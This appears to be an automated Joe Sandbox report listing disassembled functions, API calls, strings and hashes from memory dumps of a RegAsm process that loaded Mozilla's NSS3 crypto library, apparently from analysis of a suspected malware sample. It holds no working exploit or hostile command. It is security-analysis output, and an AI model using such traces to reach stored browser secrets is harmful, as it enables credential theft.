Part of subcall function 6CB409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB40BBA
Part of subcall function 6CB409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB40D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CA62D54

Part of subcall function 6CB409D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB40BCB
Part of subcall function 6CB409D0: EnterCriticalSection.KERNEL32(?), ref: 6CB40BDE
Part of subcall function 6CB409D0: OutputDebugStringA.KERNEL32(?), ref: 6CB40C16

Strings

pLabel = 0x%p, xrefs: 6CA62D4F
C_InitToken, xrefs: 6CA62CE7
ulPinLen = %d, xrefs: 6CA62D36
pPin = 0x%p, xrefs: 6CA62D1D
slotID = 0x%x, xrefs: 6CA62D02

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: d6ad23565ab51596578121292cac05eff6ba8fc1cc4ec4eb9bc73ff788bdd789
Instruction ID: d14cc623baf87a993c989bd69638f9ae93088653c6a520a697f73330e594a361
Opcode Fuzzy Hash: d6ad23565ab51596578121292cac05eff6ba8fc1cc4ec4eb9bc73ff788bdd789
Instruction Fuzzy Hash: 3D21B375640194EFDB009F55EE4CA493BB5EB4732DF488114E604A7E62DB30889CDBA2

Function 6CB40EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6CA22357), ref: 6CB40EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CA22357), ref: 6CB40EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CB40EE6

Part of subcall function 6CB409D0: PR_Now.NSS3 ref: 6CB40A22
Part of subcall function 6CB409D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB40A35
Part of subcall function 6CB409D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB40A66
Part of subcall function 6CB409D0: PR_GetCurrentThread.NSS3 ref: 6CB40A70
Part of subcall function 6CB409D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB40A9D
Part of subcall function 6CB409D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB40AC8
Part of subcall function 6CB409D0: PR_vsmprintf.NSS3(?,?), ref: 6CB40AE8
Part of subcall function 6CB409D0: EnterCriticalSection.KERNEL32(?), ref: 6CB40B19
Part of subcall function 6CB409D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB40B48
Part of subcall function 6CB409D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB40C76
Part of subcall function 6CB409D0: PR_LogFlush.NSS3 ref: 6CB40C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CB40EFA

Part of subcall function 6CA2AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA2AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB40F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB40F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB40F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB40F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CB40ED9, 6CB40EE5, 6CB40F06, 6CB40F0B
Aborting, xrefs: 6CB40EB3

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: b19757fd2d7e3c42297e4b3a8aee8c1103fa0572333b4c28226e029346190b57
Instruction ID: 40c2ec6b2f23cccd01dff2a24e9c92a01e45cf363376bf0198a62d1ad65a457d
Opcode Fuzzy Hash: b19757fd2d7e3c42297e4b3a8aee8c1103fa0572333b4c28226e029346190b57
Instruction Fuzzy Hash: 76F0AFF59001687BDE003BA0EC4AC9B3E3DDF86674F048024FD0957B02DA36E91897B2

Function 0042660D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00426634
_free.LIBCMT ref: 00426642
_free.LIBCMT ref: 0042664D
_free.LIBCMT ref: 00426621

Part of subcall function 0041D93B: HeapFree.KERNEL32(00000000,00000000,?,0041D18F,00000000,0043B6F4,0041D1D6,0040EEBE,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4), ref: 0041D951
Part of subcall function 0041D93B: GetLastError.KERNEL32(?,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4,?,?,?), ref: 0041D963

___free_lc_time.LIBCMT ref: 0042666B
_free.LIBCMT ref: 00426676
_free.LIBCMT ref: 0042669B
_free.LIBCMT ref: 004266B2
_free.LIBCMT ref: 004266C1

Strings

xLC, xrefs: 0042665B

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lc_time
String ID: xLC
API String ID: 3704779436-381350105
Opcode ID: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
Instruction ID: fdfe39178027f3e5e6c57af64549801535ecf2e9aa55874642047572a4db4e51
Opcode Fuzzy Hash: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
Instruction Fuzzy Hash: 421194F2A10311ABDF206F76E985B9BB3A5EB01308F95093FE14897251CB3C9C91CA1C

Function 6CAA4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6CAA4DCB

Part of subcall function 6CA90FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA387ED,00000800,6CA2EF74,00000000), ref: 6CA91000
Part of subcall function 6CA90FF0: PR_NewLock.NSS3(?,00000800,6CA2EF74,00000000), ref: 6CA91016
Part of subcall function 6CA90FF0: PL_InitArenaPool.NSS3(00000000,security,6CA387ED,00000008,?,00000800,6CA2EF74,00000000), ref: 6CA9102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CAA4DE1

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CAA4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAA4E59

Part of subcall function 6CA8FAB0: free.MOZGLUE(?,-00000001,?,?,6CA2F673,00000000,00000000), ref: 6CA8FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB6300C,00000000), ref: 6CAA4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6CAA4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CAA4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAA521A

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: a87620a1d741746022f4a933f7f098738b55b76701cb885857d98bc76dc63407
Instruction ID: 5c6935102dba7dc165bf04f01d4592db61193671c6754834f00469e40d66fe0b
Opcode Fuzzy Hash: a87620a1d741746022f4a933f7f098738b55b76701cb885857d98bc76dc63407
Instruction Fuzzy Hash: 01F17D71E01209CFDB04CF99D8407ADB7B2BF48358F294169E915AB781EB75E9C2CB90

Function 6CAA0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CAA2C2A), ref: 6CAA0C81

Part of subcall function 6CA8BE30: SECOID_FindOID_Util.NSS3(6CA4311B,00000000,?,6CA4311B,?), ref: 6CA8BE44

Part of subcall function 6CA78500: SECOID_GetAlgorithmTag_Util.NSS3(6CA795DC,00000000,00000000,00000000,?,6CA795DC,00000000,00000000,?,6CA57F4A,00000000,?,00000000,00000000), ref: 6CA78517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAA0CC4

Part of subcall function 6CA8FAB0: free.MOZGLUE(?,-00000001,?,?,6CA2F673,00000000,00000000), ref: 6CA8FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAA0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CAA0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CAA0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CAA0D7D
free.MOZGLUE(00000000), ref: 6CAA0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAA0DC1
free.MOZGLUE(00000000), ref: 6CAA0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAA0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CAA0E0F

Part of subcall function 6CA795C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CA57F4A,00000000,?,00000000,00000000), ref: 6CA795E0
Part of subcall function 6CA795C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CA57F4A,00000000,?,00000000,00000000), ref: 6CA795F5
Part of subcall function 6CA795C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CA79609
Part of subcall function 6CA795C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CA7961D
Part of subcall function 6CA795C0: PK11_GetInternalSlot.NSS3 ref: 6CA7970B
Part of subcall function 6CA795C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CA79756
Part of subcall function 6CA795C0: PK11_GetIVLength.NSS3(?), ref: 6CA79767
Part of subcall function 6CA795C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CA7977E
Part of subcall function 6CA795C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA7978E

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: 96e58d64c1d355b1afdeb118e7348bf256a640161d8811000c8d8c769b613f3c
Instruction ID: 59874fe52b97106f9c3ec18731cef10a966b1233fee97639f35bceffee714a46
Opcode Fuzzy Hash: 96e58d64c1d355b1afdeb118e7348bf256a640161d8811000c8d8c769b613f3c
Instruction Fuzzy Hash: 864124B2901206ABEB009FA4DD81BAF7674AF0430CF044128E91667741F735AA99CBE2

Function 6C9D2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C9D2F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C9D2FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C9D3005
memcpy.VCRUNTIME140(?,?,?), ref: 6C9D30EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C9D3131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9D3178

Strings

database corruption, xrefs: 6C9D316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9D3022, 6C9D3156, 6C9D3162, 6C9D318A, 6C9D3196, 6C9D31A2, 6C9D31AE, 6C9D31BA, 6C9D31C6
%s at line %d of [%.10s], xrefs: 6C9D3171

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: a77923b45def7f750122e0289895d86f834ebd925ab9a48cf9eadd27be755991
Instruction ID: da6efbd0005d6fe9ce0170506996c94013f1212e73177c56a4808cb6121fe544
Opcode Fuzzy Hash: a77923b45def7f750122e0289895d86f834ebd925ab9a48cf9eadd27be755991
Instruction Fuzzy Hash: 7CB19E70E0561A9BCB18CFADC884AEEB7B1BF48305F258429E855B7B45D374E941CBA0

Function 0041B991 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,01102590), ref: 0041B9C5
GetFileSize.KERNEL32(?,00000000), ref: 0041BA3E
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BA5A
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041BA6E
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BA77
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BA87
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BAA5
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BAB5

Strings

, xrefs: 0041BA11

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
Instruction ID: 2f96ef8e8c352da0c6fd23b8bc0b50d76e073618b9a0ce70252d9e73764e8c17
Opcode Fuzzy Hash: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
Instruction Fuzzy Hash: 4A51F3B1D0021CAFDB28DF99DC85AEEBBB9EF04344F10442AE511E6260D7789D85CF94

Function 6CA4FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CA4FCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CA4FCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CA4FCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA4FD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CA4FD46
PORT_Alloc_Util.NSS3(00000001), ref: 6CA4FD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CA4FD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA4FD84

Strings

:, xrefs: 6CA4FD78

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 1752ef076f54116e8f164a19b6c92d597a663278dd0b7f7696cab7588d58d5f8
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: 963103B6D002559BEB008BA4ED01BAFB7A8EF5435CF198139DC14A7B00E772E958C7D2

Function 6CA66C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6CA66C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA66C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA66CA3

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA66CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CA66CD5

Strings

pMechanism = 0x%p, xrefs: 6CA66CD0
C_DigestInit, xrefs: 6CA66C61
(CK_INVALID_HANDLE), xrefs: 6CA66C9C
hSession = 0x%x, xrefs: 6CA66C7E, 6CA66C8E

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: cfb3561f2f3b58b0908e55a15c69cd0f4d924629952dcb4986867469bd518837
Instruction ID: 2c1734a6e75b43af69e3bb176f81e05a741d7ee20c751b94b5e0e74eb67e3fb0
Opcode Fuzzy Hash: cfb3561f2f3b58b0908e55a15c69cd0f4d924629952dcb4986867469bd518837
Instruction Fuzzy Hash: DF21F535A00154ABDB009F26EF89B9E37B5EF4731CF484029E50997F11DB30999CCB92

Function 6CA69DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SessionCancel), ref: 6CA69DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA69E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA69E33

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA69E49
PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CA69E65

Strings

(CK_INVALID_HANDLE), xrefs: 6CA69E2C
flags = 0x%x, xrefs: 6CA69E60
hSession = 0x%x, xrefs: 6CA69E0E, 6CA69E1E
C_SessionCancel, xrefs: 6CA69DF1

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
API String ID: 1003633598-1678415578
Opcode ID: 6d208d2de97ff1194dae91e790e258c8bffaf431548c6de68a318273a3217338
Instruction ID: d307aab0631ce2f9eb86c3d9c245f410a8762966a8550eee485b52c4579f1d27
Opcode Fuzzy Hash: 6d208d2de97ff1194dae91e790e258c8bffaf431548c6de68a318273a3217338
Instruction Fuzzy Hash: 38210475A41294AFDB009F65EF88BAE33B9AB47718F484025E90897F11DB308C9CC692

Function 6CA36DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6CA37D8F,6CA37D8F,?,?), ref: 6CA36DC8

Part of subcall function 6CA8FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CA8FE08
Part of subcall function 6CA8FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CA8FE1D
Part of subcall function 6CA8FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CA8FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CA37D8F,?,?), ref: 6CA36DD5

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
